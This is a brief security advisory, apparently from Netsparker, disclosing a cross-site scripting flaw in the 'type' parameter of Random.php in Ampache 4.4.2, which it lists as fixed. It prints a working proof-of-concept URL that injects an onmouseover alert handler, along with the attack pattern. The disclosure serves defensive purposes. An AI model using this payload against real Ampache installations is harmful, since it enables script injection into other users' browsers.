Ampache 4.4.2 Cross Site Scripting

Ampache version 4.4.2 suffers from a cross site scripting vulnerability.


MD5 | ac4b9b998efcfeeb7354128b30e3711c

Information
--------------------
Advisory by Netsparker
Name: Cross-site Scripting vulnerability in Ampache 4.4.2
Affected Software: Ampache
Affected Versions: 4.4.2
Homepage: http://ampache.org/
Vulnerability: Cross-Site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): 7.4 (High)
Netsparker Advisory Reference: NS-21-003

Technical Details
--------------------

Cross-site scripting in Random.php

URL:
http://alihost:1134/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20
Parameter Name: type
Parameter Type: GET
Attack Pattern: %27%22+ns%3dnetsparker(0x0002DE)+

For more information:
https://www.netsparker.com/web-applications-advisories/ns-21-003-cross-site-scripting-in-ampache/

Related Posts